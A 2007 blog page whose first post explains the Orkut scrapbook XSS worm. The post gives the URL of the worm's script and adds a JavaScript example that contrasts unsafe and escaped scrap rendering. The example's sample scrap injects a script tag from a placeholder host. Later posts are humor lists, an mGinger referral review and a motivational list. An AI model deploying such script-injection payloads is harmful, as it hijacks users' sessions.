Microsoft Anti Virus


Tuesday, 18 December 2007

Orkut XSS attack - that "2008 vem ai... que ele comece mto bem para vc" thingie

Posted on 20:04 by Unknown







A lot of you have probably been wondering how you received a scrap saying "2008 vem ai... que ele comece mto bem para vc" from me or possibly from some friend of yours.



It's called an XSS attack, or cross-site scripting attack. A piece of JavaScript code gets executed on the client side (that is, in your browser) when you receive a scrap carrying the spam message from a friend's ID (obviously after their Orkut session is infected with the malicious code), and it starts scrapping everyone. This happens when you log into your Orkut scrapbook to read the malicious scrap.

When someone sends you a spam scrap and you read it, the same scrap is sent to your friends from your account. This will spread for the coming few days, possibly until Orkut takes some measures.

Steps you can take:

If possible, change your Gmail account password and do not log in to Orkut until they sort this out.



Courtesy: Antrix.net (find link in comments)

The script is fetched from here: http://files.myopera.com/virusdoorkut/files/virus.js


author="Rodrigo Lacerda"



The Orkut website is built on ASP.NET; if you wish to read the technical side of preventing XSS attacks in ASP.NET, go here.
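
The scrapbook flaw described in this post comes down to scrap text reaching the reader's page as live markup. As an added example (not Orkut's code and not from the original post), the following JavaScript puts an unescaped scrap renderer beside one that escapes everything and restores only a few attribute-free formatting tags; every function name, the tag allowlist and the sample scrap are constructed for illustration.

```javascript
// Added example: all names and the sample scrap are constructed, not Orkut code.
const ALLOWED_TAGS = new Set(["b", "i", "u", "br"]); // assumed formatting allowlist

// Constructed sample: the spam text plus a script tag pointing at a placeholder host.
const SAMPLE_SCRAP =
  '2008 vem ai...<br/><script src="https://example.invalid/sample.js"></script>';

function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable form: sender and body are interpolated into the page as markup,
// so any tag inside a scrap runs in the reader's logged-in session.
function renderScrapUnsafe(sender, body) {
  return `<div class="scrap"><b>${sender}</b>: ${body}</div>`;
}

// Hardened form: escape the whole body first, then turn back on only
// allowlisted tags that carry no attributes (so no src=, no on*= handlers).
function renderScrapSafe(sender, body) {
  const escaped = escapeHtml(body);
  const restored = escaped.replace(
    /&lt;(\/?)([a-z]+)\s*(\/?)&gt;/gi,
    (match, close, tag, selfClose) => {
      const name = tag.toLowerCase();
      return ALLOWED_TAGS.has(name) ? `<${close}${name}${selfClose}>` : match;
    }
  );
  return `<div class="scrap"><b>${escapeHtml(sender)}</b>: ${restored}</div>`;
}

// Review helper: list the tag names that are still live markup in the output.
function liveTags(html) {
  const names = new Set();
  for (const m of html.matchAll(/<\/?([a-z][a-z0-9]*)/gi)) {
    names.add(m[1].toLowerCase());
  }
  return [...names].sort();
}

console.log("unsafe:", liveTags(renderScrapUnsafe("friend", SAMPLE_SCRAP)));
console.log("safe:  ", liveTags(renderScrapSafe("friend", SAMPLE_SCRAP)));
```
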



Update:

1.) The problem seems to have been sorted out by Orkut in 2 days (that's long).

2.) 400,000 users affected.

3.) Top users affected by country: US, Germany, India, Brazil.

4.) Orkut has still not accepted it was a mistake from their side. The official Orkut blog is still mum on the incident.

5.) Your password is safe, though it was possible to hack your Gmail password if, say, the virus redirected you to a page which looked exactly like Orkut and asked you to log in again.



Posted in Google, Internet, Observations, Rumours | No comments

Wednesday, 31 October 2007

Few questions no one has answers to (and no one cares)

Posted on 08:08 by Unknown
Since we were kids we were always told to shut up when we asked the grown-ups questions they did not know the answers to, like when your dad would ask your mom to tell anyone who calls that he is not home and you would go, why?

Eventually it becomes a habit to not ask questions that no one has answers to, unless you happen to be me. So here goes. World, blame me all you will; I dare to ask yet again!


1. If the earth is in the solar system and the solar system is in the galaxy and the galaxy is in the universe, what is the universe in?

2. If the sky is blue because the ocean's blue, how is the ocean blue?

3. Why is the most beautiful girl in class always in the next class, bus, car, train, plane?

4. Between a girl and a guy, how is a guy always wrong?

5. If humans evolved from monkeys what did monkeys evolve from?

6. Why doesn't "tulsi" virani get old and die?

7. If marriage is a holy institution, how do we graduate from it?

8. Why do guys become bald after marriage?

9. Why do women live longer than guys?

10. Why are chromosomes named x and y and not a and b?

11. Why do people constantly return to the refrigerator with hopes that something new to eat will have materialized? (heard somewhere)

12. Whenever an adult is kidnapped, why isn't it called adultnapped? (heard somewhere)

13. Why do we all think we sing well?

14. Can a school teacher give a homeless child homework?(heard somewhere)

15. If god is great and great souls are humble, why does he wanna be worshipped?

16. Why is Mickey Mouse bigger than his dog Pluto?(heard somewhere)

17. Why is it called a "building" when it is already built?(heard somewhere)

18. Why does the red light always go on as you reach a traffic signal?

19. Why is the traffic slow every time you have to reach somewhere in a hurry?

20. Why can't you find things when you are desperate to find them?

21. Why do superheroes wear underpants outside?
Posted in Humor, Pop Culture | No comments

Sunday, 28 October 2007

Welcome to the wannabe nation

Posted on 23:29 by Unknown
This post is about a nation obsessed with being someone else, completely hating its own identity, and in trying to become someone else ending up confused. Namaste, welcome to the most wannabe nation in the world. Welcome to India.


You know someone is a wannabe when

1. You work in a call center asking Americans to pay their bills but look down upon the domestic call center guy who tells Indians to pay the bills

2. You completely despise bidhi (desi cigarette) but sell your dog's food to go to a hookah bar

3. You wear short tees, really short, and keep pulling them down

4. You wear low-waist jeans, really low (or loose fit) jeans, and keep pulling them up

5. Your mom goes to kitty parties not knowing who Kitty was or why she started such a sad party

6. The bouncers at the disco see you more often than the guy who made the mistake of giving you birth (bless that poor soul)

7. You adore Shakira, Deepika Padukone, Bipasha and all the dusky women but would look for a "fair girl" when wanting to get married

8. You code 'cause it pays well; you copy every line of code from Google and write your name in the comment section

9. You wait for your chance to get an on-site project and then come home and tell people it was fun and you dated American chicks, smartly hiding the 16 hr work shifts and countless abuses from Americans, not to forget that none of the American chicks looked at you while you were there.

10. You look for a wife/husband on those online matrimony sites but match religion, caste, kundli and want a traditional wife/husband

11. You sell your chaddis to get on page 3, not realizing no one reads the page but yourself and other wannabes.

12. Your name just got mutilated and you feel happy about it: Vishal became Vishy, Pooja became Poo (isn't that a dog's name? a diseased dumb dog?)

13. You call everyone a dude, everyone, your mom, your dog, 'cause everyone else calls you dude instead of dodo, which they should call you

14. You completely agree that god doesn't exist but are seen at Siddhivinayaka temple after exams doing some scientific research with folded hands


I'm not done yet, more coming...
Posted in Humor, Pop Culture | No comments

Thursday, 17 May 2007

mGinger Mobile Ad Network Review

Posted on 23:14 by Unknown

MGinger Social Adnetwork

There has been a lot of buzz on the internet, especially on social networking sites like Orkut, about mGinger. It's a mobile ad network that pays you to read ads on your mobile.

The idea is simple, like all other multi-level marketing schemes: you join and refer your friends, your friends refer their friends, and you have a 2-tier network going.

When your friends or their friends read an ad on their mobile, you get a share of the profit. According to their website, the average earning if you just refer 10 friends who refer 10 of their friends will be 1860, which is not bad.

But whether advertisers will buy into mGinger is still a question. Everyone knows that when people get paid to watch ads, that's exactly what they do: watch ads to get paid, not because they are genuinely interested. Expect a lot of fake profiles, fake mobiles, people selecting all categories just to receive ads, a lot of fraud.

In my view advertisers will stay away from such schemes unless the profiles can be screened. Basically, from an advertiser's point of view, paying the audience to see my message is a bad idea.

But then you never know. Let's wait and watch if this ginger spices up my wallet as well.

Visit mGinger Website(aff)


Posted in | No comments

Monday, 23 April 2007

How to be remarkable

Posted on 04:38 by Unknown
1. Understand the urgency of the situation. Half-measures simply won’t do. The only way to grow is to abandon your strategy of doing what you did yesterday, but better. Commit.

2. Remarkable doesn’t mean remarkable to you. It means remarkable to me. Am I going to make a remark about it? If not, then you’re average, and average is for losers.

3. Being noticed is not the same as being remarkable. Running down the street naked will get you noticed, but it won’t accomplish much. It’s easy to pull off a stunt, but not useful.

4. Extremism in the pursuit of remarkability is no sin. In fact, it’s practically a requirement. People in first place, those considered the best in the world, these are the folks that get what they want. Rock stars have groupies because they’re stars, not because they’re good looking.

5. Remarkability lies in the edges. The biggest, fastest, slowest, richest, easiest, most difficult. It doesn’t always matter which edge, more that you’re at (or beyond) the edge.

6. Not everyone appreciates your efforts to be remarkable. In fact, most people don’t. So what? Most people are ostriches, heads in the sand, unable to help you anyway. Your goal isn’t to please everyone. Your goal is to please those that actually speak up, spread the word, buy new things or hire the talented.

7. If it’s in a manual, if it’s the accepted wisdom, if you can find it in a Dummies book, then guess what? It’s boring, not remarkable. Part of what it takes to do something remarkable is to do something first and best. Roger Bannister was remarkable. The next guy, the guy who broke Bannister’s record wasn’t. He was just faster … but it doesn’t matter.

8. It’s not really as frightening as it seems. They keep the masses in line by threatening them (us) with all manner of horrible outcomes if we dare to step out of line. But who loses their jobs at the mass layoffs? Who has trouble finding a new gig? Not the remarkable minority, that’s for sure.

9. If you put it on a T-shirt, would people wear it? No use being remarkable at something that people don’t care about. Not ALL people, mind you, just a few. A few people insanely focused on what you do is far far better than thousands of people who might be mildly interested, right?

10. What’s fashionable soon becomes unfashionable. While you might be remarkable for a time, if you don’t reinvest and reinvent, you won’t be for long. Instead of resting on your laurels, you must commit to being remarkable again quite soon.

Posted in Personal Development | No comments